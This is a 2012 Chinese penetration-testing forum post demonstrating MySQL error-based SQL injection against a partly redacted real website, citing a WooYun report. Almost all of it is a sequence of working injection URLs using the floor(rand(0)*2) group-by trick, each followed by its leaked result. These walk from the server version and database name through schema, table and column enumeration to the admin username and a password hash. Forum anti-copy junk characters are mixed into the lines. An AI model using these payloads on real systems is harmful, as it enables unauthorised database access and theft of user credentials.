找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1928|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666% ~7 T/ w  q, w$ x# H2 O
7 F; o8 o2 C* i3 V# c$ y
之前想找个测试 没想到这有 可以测试下做个记录而已 6 U) S+ b9 t+ o

2 m4 ?/ V5 H) B* Uhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
  V& z4 c" A! C( q! s$ h+ s) _
5 G6 C2 B; O* l; a8 H/data0/htdocs/leqi_new/app/myapp.php
7 A/ \$ s# c2 R  V9 |
3 n8 _5 P/ E* i, A 或者
0 \" |5 f! _( H& _+ F6 d: K- S/ U7 U- v8 i4 g- F" q; m
/**********version()**********/ 5.1.49-log
% T9 S9 K9 K4 l2 Y, hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- ?' P" o7 [+ h$ `" q
- R$ o5 u0 {% j$ ^
/**********user()**********/  
2 u( ?2 O, \( j( F' \4 x% i$ C0 khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ C- `: ?3 G8 t, I: i$ _  s
7 @8 C5 o6 h7 a* @/**********database()**********/  leqi
. ?' D+ b5 `' J: W+ `* v+ Q4 L- ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ e; g' t6 M5 L5 [+ D
4 O: U% n/ H* T2 M) [/**********limit依次递归爆库**********/
( M$ n9 j* Z9 b6 b& Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 _1 }' g5 I# \! I- [; }information_schema
3 y, H( M' R5 B$ Z# ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 u5 `4 f7 q* O0 h- m( y" j
leqi+ s' e$ E" f) x$ D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003, X- O8 L8 A. t" b
test' J' C/ l" H8 j; {1 X

! B# C- ^9 G) [/**********limit依次递归爆表名**********/
' r! G) \/ E; {' ~  T% a6 Xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' M* f' K* b3 ]' ~% c0 Q5 zusers
5 K' l% O- {" G; I, f! d* b7 u$ z  t+ }+ @' z
/**********limit依次递归爆字段名**********/
/ U% Z8 k1 R$ Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- h% |! i& w, b  O) f& ^3 k$ W5 juser_id,username,nickname,passwd,group_id0 s9 g( J1 X( g. N: q; l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, U% W0 k! M7 a  [7 w- a3 h
/wapc/5000_0005_0031 ]0 A7 b1 J3 k% o4 [- U
11 21; Q1 p' c6 X  y$ |2 `  b9 ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, Q/ s& Y: k% t* S6 ?5 N/wapc/5000_0005_003
9 s, @) q6 v7 ^4 }4 Y11 341 351 361
# {7 p4 i4 ?, ?  c3 @/**********爆数据**********/
' C3 b1 [/ p" Y* x5 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 ~) z% W: _$ x, Z
admin4 C5 @! N: H. X+ C$ h5 `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 e6 z3 v+ j) Q; E! c1 }3 O# `6a8b4574ca231eb8bd52764d4978ffcd
; l3 a) N/ M' ]- C, D% h' x. Q; V
6 k& ?2 Z% Q  F6 w5 O7 ^- \" M# F, E
4 [8 u; k# n2 s; R5 I
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表